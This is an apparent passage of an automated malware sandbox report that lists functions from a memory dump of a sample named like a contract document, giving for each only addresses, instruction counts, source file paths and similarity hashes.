                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ff130ef6a3765a8cd5ddb81e46fb429191e75d9bb116d6a317cb54d8315ceccb
                                                                                                                        • Instruction ID: 7ed7d3beeeeb24908fd659ce8eae808a3f89190dfc8037297915bb170ae15b82
                                                                                                                        • Opcode Fuzzy Hash: ff130ef6a3765a8cd5ddb81e46fb429191e75d9bb116d6a317cb54d8315ceccb
                                                                                                                        • Instruction Fuzzy Hash: CA0124311402119BCB32AF298494D37FBBAFFD16A0BA4446EF2110B215CF30EE81CB90
                                                                                                                        Function 016FC020 Relevance: .0, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                        • Instruction ID: ce31bef99e60d8c210d65c3b518c43c42512d722a1590ee486167d415e07bb73
                                                                                                                        • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                        • Instruction Fuzzy Hash: D60128321007099FEB3296ADC804EA7F7E9FFC5214F14481DEA468B544DBB1E443C760
                                                                                                                        Function 017420F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 506072d6d1fb6cac77647e935b1e246573740e0cd84ad41199b1496e59d181c8
                                                                                                                        • Instruction ID: bb66d60d162dc3bd299b4ca15a567c995fdf2a8ccd4b8b3aaf77043c7958bfe0
                                                                                                                        • Opcode Fuzzy Hash: 506072d6d1fb6cac77647e935b1e246573740e0cd84ad41199b1496e59d181c8
                                                                                                                        • Instruction Fuzzy Hash: 1E116D35A0120DAFDF05EFA4D854FAEBBB5EB44250F004099F90297254E735AE11CB90
                                                                                                                        Function 0173E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7b3c0b2ab9f67562d8d60b5b2e1966a9a41805542256ff6aec95c667c0334eb6
                                                                                                                        • Instruction ID: 51f546a201763b02d6b2953f51b2c85b303c15d41cce1f483c03311d3630d08f
                                                                                                                        • Opcode Fuzzy Hash: 7b3c0b2ab9f67562d8d60b5b2e1966a9a41805542256ff6aec95c667c0334eb6
                                                                                                                        • Instruction Fuzzy Hash: 1C0184713416117BD711BB7DCD84E57F7ACFB95664B100529B60583659DB24EC01C6A0
                                                                                                                        Function 017969C0 Relevance: .0, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 21da752a0f5cecb02ee4aad452077244d60c0315493f1548207f714593776a84
                                                                                                                        • Instruction ID: 33efb44a57ccfdd1344ce9751ad6c5d2e7cb3f027c20fe83930f1120227613dd
                                                                                                                        • Opcode Fuzzy Hash: 21da752a0f5cecb02ee4aad452077244d60c0315493f1548207f714593776a84
                                                                                                                        • Instruction Fuzzy Hash: C701FC322242129BC720DF6ED848967FBA9FF54660F514229F95987180E7349A05C7D1
                                                                                                                        Function 0178C460 Relevance: .0, Instructions: 48COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8a2b2f99c5d901affdee927b0e14ba4697b7b77b4e0aa8e1dfdd0daf7027f9e2
                                                                                                                        • Instruction ID: 1944128b12ee6ea9365ae9820234dc0c26cc29b2483ef519fb4e6307596d1e60
                                                                                                                        • Opcode Fuzzy Hash: 8a2b2f99c5d901affdee927b0e14ba4697b7b77b4e0aa8e1dfdd0daf7027f9e2
                                                                                                                        • Instruction Fuzzy Hash: E3115B71A01209ABDB16EFA8C844EEEBBB5FB48250F004059B90597344DA34E951DBA0
                                                                                                                        Function 0178C97C Relevance: .0, Instructions: 48COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 11a4901f218f688fa5ad4c52c1101a742349edacbe9ae1236481c2288694848b
                                                                                                                        • Instruction ID: 4d0e26edefa7389ec77743e948e5e96864aa2f0b4b6e68962bf634c50d0a6fda
                                                                                                                        • Opcode Fuzzy Hash: 11a4901f218f688fa5ad4c52c1101a742349edacbe9ae1236481c2288694848b
                                                                                                                        • Instruction Fuzzy Hash: 5C1179B16183089FC700DF69C445A9BFBE4EF98310F00855EB998D7394E630E900CBA2
                                                                                                                        Function 0178CA11 Relevance: .0, Instructions: 48COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bc045603e9196a079dd96866902ed54167caceb955d9e14155fce9c220cbf53e
                                                                                                                        • Instruction ID: 24c2a25b6451fd4778d6c72fd90901e2e03ad83dc1574019c1bf06bbcd1abdfa
                                                                                                                        • Opcode Fuzzy Hash: bc045603e9196a079dd96866902ed54167caceb955d9e14155fce9c220cbf53e
                                                                                                                        • Instruction Fuzzy Hash: DF1179B16183089FC300DF69C445A9BFBE4FF99350F00851EB998D73A4E630E900CBA2
                                                                                                                        Function 0171E016 Relevance: .0, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                        • Instruction ID: 065532f12d5529c6914f1bfbc15fe69f909a3e8548ea7849abcaa58411750351
                                                                                                                        • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                        • Instruction Fuzzy Hash: 3E012872200684DFE327DB1DCA48F26FBE8EB45B54F1904A1FE05CB6A6DA78DC40C661
                                                                                                                        Function 016F826B Relevance: .0, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a5d031901756b08782b4ae4f892c67b3d9a5b6469aa89dfe2459b08ea084533a
                                                                                                                        • Instruction ID: f1e7b3862e182a943884385be1b1bc2b67083ab69bfab49a2941d4cd199d594e
                                                                                                                        • Opcode Fuzzy Hash: a5d031901756b08782b4ae4f892c67b3d9a5b6469aa89dfe2459b08ea084533a
                                                                                                                        • Instruction Fuzzy Hash: 4E018F35600505DFDB14EB6ADC089AFB7ADEF81220B5580AD9A02A7784EE30E902C690
                                                                                                                        Function 017AEB50 Relevance: .0, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: ebb5de6d555e7c25edfcd4c36e186acfeff0556b918e2a58132376460e472ad8
                                                                                                                        • Instruction ID: 197782c4f30580af3ef38da600eccddcf1ffa7a13815811fc0075a7a0f1e8f85
                                                                                                                        • Opcode Fuzzy Hash: ebb5de6d555e7c25edfcd4c36e186acfeff0556b918e2a58132376460e472ad8
                                                                                                                        • Instruction Fuzzy Hash: F701A7712447019FD7315B1AD844F03FBA8EF95B60F11442DB7169F394D6B0A880CBA4
                                                                                                                        Function 01702582 Relevance: .0, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2331bd4ad47533ccb49162bfbc0f1e68adcc37cc39290cdd6bb0d728489de9a4
                                                                                                                        • Instruction ID: b98bc7761500e21d5632f13d7ded5677066f854026d1986b23020e851d4ee0f9
                                                                                                                        • Opcode Fuzzy Hash: 2331bd4ad47533ccb49162bfbc0f1e68adcc37cc39290cdd6bb0d728489de9a4
                                                                                                                        • Instruction Fuzzy Hash: 36F0F433A41B10BBC7329B5A8C84F47FEE9EB84BA0F104068B61597684DA30ED01CAA0
                                                                                                                        Function 0172C073 Relevance: .0, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                        • Instruction ID: 352e453d508a4cddc25ed08c3c8a514227a17c1f4ba6b71a5aca2ca5cb0cc90a
                                                                                                                        • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                        • Instruction Fuzzy Hash: 74F0C2B2A00621ABD335CF4DDC40E57FBEADBD5A80F048128E605CB224EA31DD05CB90
                                                                                                                        Function 017D634F Relevance: .0, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e641d09f5849b9437317690fe5204cb99e8d124ede6e2a2c07e6e287a864008b
                                                                                                                        • Instruction ID: 1f52840cb8bc06ed94a5b859e0622d007642ad0872b4db37df9caa5303130a0a
                                                                                                                        • Opcode Fuzzy Hash: e641d09f5849b9437317690fe5204cb99e8d124ede6e2a2c07e6e287a864008b
                                                                                                                        • Instruction Fuzzy Hash: BD012C71A1020DABDB04DFA9D555AAEF7F8FF58314F10406AF905E7350DB74DA018BA4
                                                                                                                        Function 016FC310 Relevance: .0, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                        • Instruction ID: 6b015f415f60856a066b44daf4c12596233a54b137789a5d775857d536ad57ed
                                                                                                                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                        • Instruction Fuzzy Hash: A9F0F633205A279BD7321A5D8C40F2BAA9ADFD1AE4F1A043DE3099B244CA718D02A6D1
                                                                                                                        Function 017D625D Relevance: .0, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f7e64bea9cfc2c544b0f6fd5265b04cd31a6199c59770a27b9355c5f73636c96
                                                                                                                        • Instruction ID: ef150ae3ee8ea2638c0ffc4318758cc3f07a84ce6157ac1163dd6a85634c7ccc
                                                                                                                        • Opcode Fuzzy Hash: f7e64bea9cfc2c544b0f6fd5265b04cd31a6199c59770a27b9355c5f73636c96
                                                                                                                        • Instruction Fuzzy Hash: B7017C71A1020EABCB04DFA9D445AAEF7F8EF58310F10806AF904E7354D774AA008BA0
                                                                                                                        Function 017D62D6 Relevance: .0, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1e09e77f680446faa868f4fe2b8343ea54d9305dfb83225e13d0e71e8e0ce3d4
                                                                                                                        • Instruction ID: dd76a6cf88e57a749989dc60457d7cc00ecdaf170e1db9a40247915a5aedd6b6
                                                                                                                        • Opcode Fuzzy Hash: 1e09e77f680446faa868f4fe2b8343ea54d9305dfb83225e13d0e71e8e0ce3d4
                                                                                                                        • Instruction Fuzzy Hash: C6012C71A1020DABDB04DFA9D445AAEFBF8EF58314F50806AF915E7390DB749A018BA4
                                                                                                                        Function 0173CA6F Relevance: .0, Instructions: 42COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                        • Instruction ID: cac5fd6370cf8c2b3d6a1ca96e6efdaf06f02d934483156fd8f201fbfb801022
                                                                                                                        • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                        • Instruction Fuzzy Hash: D701F432300689ABD723AB1DC80DF59FFD9EF81754F0940E6FA449B6A2D6B8C941C221
                                                                                                                        Function 017D61E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: db77969ada8b597ba046c05e28919609e1858c5fffcb19534c795603d95d7205
                                                                                                                        • Instruction ID: d452d437974c3ef2763a2166f5a8d973f5ac5e5a13ee7da042f620e5e42f54d6
                                                                                                                        • Opcode Fuzzy Hash: db77969ada8b597ba046c05e28919609e1858c5fffcb19534c795603d95d7205
                                                                                                                        • Instruction Fuzzy Hash: 51012C71A102599BDB04DFA9D445AAEFBB8EF58310F14405AF505A7290D774AA01CB94
                                                                                                                        Function 017863C0 Relevance: .0, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                        • Instruction ID: 8c8e1c22019fac10b34d20a4585d5525909278caa46128a49fc343edeed8d0f1
                                                                                                                        • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                        • Instruction Fuzzy Hash: 25F0127220001DBFEF019F94DD80DAFBB7DEB55698B104125FA1192160D631DD21A7A0
                                                                                                                        Function 0178A4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 807db1a907905feedd6af5e963048d2a88b409a13410ed0f4d933e1307321de8
                                                                                                                        • Instruction ID: b4412a2445a6bbaa72174215b9ad5f0d8161da46926c5645e6df31d27af86e32
                                                                                                                        • Opcode Fuzzy Hash: 807db1a907905feedd6af5e963048d2a88b409a13410ed0f4d933e1307321de8
                                                                                                                        • Instruction Fuzzy Hash: 1A018936100149ABCF12AE84D840EDA7F66FB4C664F058116FE1866224C332D9B0EB91
                                                                                                                        Function 016FC0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8064f7ae382c48982460a3c5b6b80c89762ebcbdb89973573fcfb4d16deb2980
                                                                                                                        • Instruction ID: 31b73c4db135c3d7b23338d4de90435a68e48c6858999142747bb58fed4b1589
                                                                                                                        • Opcode Fuzzy Hash: 8064f7ae382c48982460a3c5b6b80c89762ebcbdb89973573fcfb4d16deb2980
                                                                                                                        • Instruction Fuzzy Hash: 86F024726042495BF354DA1D8C02F23329AE7D0696FA5806EEB058B3C1EF71DC1283A6
                                                                                                                        Function 0173656A Relevance: .0, Instructions: 39COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7867d6273d849eea0914d82b81dec573d0326eddbea1b25343e8e3802ca79400
                                                                                                                        • Instruction ID: 73cf9a47e2c8b145a7eb3f894fa6fe0618934c9c98cc488b6cbe50a5333b8290
                                                                                                                        • Opcode Fuzzy Hash: 7867d6273d849eea0914d82b81dec573d0326eddbea1b25343e8e3802ca79400
                                                                                                                        • Instruction Fuzzy Hash: AE01A470301681ABE7229B2CCD4CF25BBE4BB80B14F5841A4BA019B6DBD728D541C220
                                                                                                                        Function 017A437C Relevance: .0, Instructions: 37COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                        • Instruction ID: ac8e2bd7dba67c94de5246563d6f4fc9bfe3c536439dff5f61264cd616cb40c7
                                                                                                                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                        • Instruction Fuzzy Hash: 06F0E93534191347EB35AA2E8424B2EEA559FD0A01B4D472D9603EB644DFA1D8058790
                                                                                                                        Function 0178E872 Relevance: .0, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                        • Instruction ID: de8f51ccfb9caabe7a984b457dac0bf8a80a2489880a545ef30a013a6fa5e0f8
                                                                                                                        • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                        • Instruction Fuzzy Hash: 25F082337E56229BE331AE4ECC80F1AF7A8EFD5A60F191475A6149B264CB60EC41C7D0
                                                                                                                        Function 0178C89D Relevance: .0, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1f1f19c1b197651d8d75ec47f5a3d49f05f31c59b327a46873976ab5d37eec7e
                                                                                                                        • Instruction ID: 85e0d51f55ec4d9011eb6944c06f71e40d6fffd7aa350a5c9acb2cbc2df5ecb1
                                                                                                                        • Opcode Fuzzy Hash: 1f1f19c1b197651d8d75ec47f5a3d49f05f31c59b327a46873976ab5d37eec7e
                                                                                                                        • Instruction Fuzzy Hash: BDF0AF706593049FC310EF68C445A1BF7E4FF98710F80465AB898DB394E634E900CB96
                                                                                                                        Function 01730854 Relevance: .0, Instructions: 35COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                        • Instruction ID: a255d424a4dc6c927bb3d4c465695fc852ce311719750ff573b958c35370a1b1
                                                                                                                        • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                        • Instruction Fuzzy Hash: 0FF02472600200AFE314DF25CC00F86B7E9EFE8304F148078A544CB164FAB0DD10C694
                                                                                                                        Function 0178C912 Relevance: .0, Instructions: 34COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ae0507967317bd6a6f0c3e47b5aa2870c17e7855cf5eadace00ae7f604956a71
                                                                                                                        • Instruction ID: 19df370ede48d378798e223da9b4cb2de232315d7249ec021c158208ef82181a
                                                                                                                        • Opcode Fuzzy Hash: ae0507967317bd6a6f0c3e47b5aa2870c17e7855cf5eadace00ae7f604956a71
                                                                                                                        • Instruction Fuzzy Hash: 8AF06270A01249DFCB04EFA9C515EAEF7B4FF18300F108059B955EB399DA34EA01CB64
                                                                                                                        Function 017047FB Relevance: .0, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8bfb67d5f7a1272fa2c85d23f381115aba095f3cb7d27e387c8cabf60744d21d
